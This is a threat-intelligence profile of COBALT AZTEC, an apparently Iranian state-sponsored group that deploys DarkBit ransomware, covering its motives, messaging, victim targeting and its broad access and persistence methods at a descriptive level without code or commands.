COBALT AZTEC

COBALT AZTEC is an Iranian state-sponsored threat group that operates and distributes DarkBit ransomware in destructive cyber attacks. Originally thought to be financially motivated based on available evidence, CTU researchers first assigned COBALT AZTEC the 'GOLD' prefix to represent cybercriminal intent. However, subsequent analysis suggested the group's Iranian state sponsorship and primary motivation to disrupt Iran's strategic adversaries.  While COBALT AZTEC may continue to pursue financial gain as a secondary motivation, it does not meet CTU criteria for designation as a financially-motivated cybercriminal group.

COBALT AZTEC has been active since at least December 2022 when the group established a victim payment portal on the Tor network and targeted their first known victim. COBALT AZTEC exfiltrates data from targeted networks prior to deployment of DarkBit, a Golang-based ransomware family built for both Windows and VMware ESXi that encrypts files using the RSA and AES algorithms. The encryption process leaves a ransom note with instructions on how to contact the threat actors and begin negotiating payment for the decryption of files. While COBALT AZTEC engages victims through emails threatening the public release of stolen data on non-payment of the ransom, financial motivation is likely secondary to the main aims of causing disruption and reputational damage.

In early February 2023, the group changed the imagery on their Tor site to include the phrase: "Against any kind of racism, fascism, and apartheid.", and established a Twitter account and Telegram channel that expressed similar sentiments. This suggested hacktivist intent, and coincided with the targeting of an entity in Israel that the country's National Cyber Directorate later linked to COBALT ULSTER (aka MuddyWater). COBALT AZTEC has offered stolen data for sale on its dedicated Telegram channel, but it is not clear whether this is genuine or simply used as a means to showcase the data taken. As of March 2023, the limited known DarkBit victimology suggests targeting of organizations in countries that have signed the Abraham accords.

COBALT AZTEC may rely on other Iranian threat groups for gaining entry into targeted organizations or buy access from initial access brokers (IABs). Persistent access to the environment is maintained with OpenSSH facilitated tunnels back to the attacker's infrastructure hosted at a commercial cloud computing provider. These tunnels allow RDP access into the victim's environment which are used for lateral movement.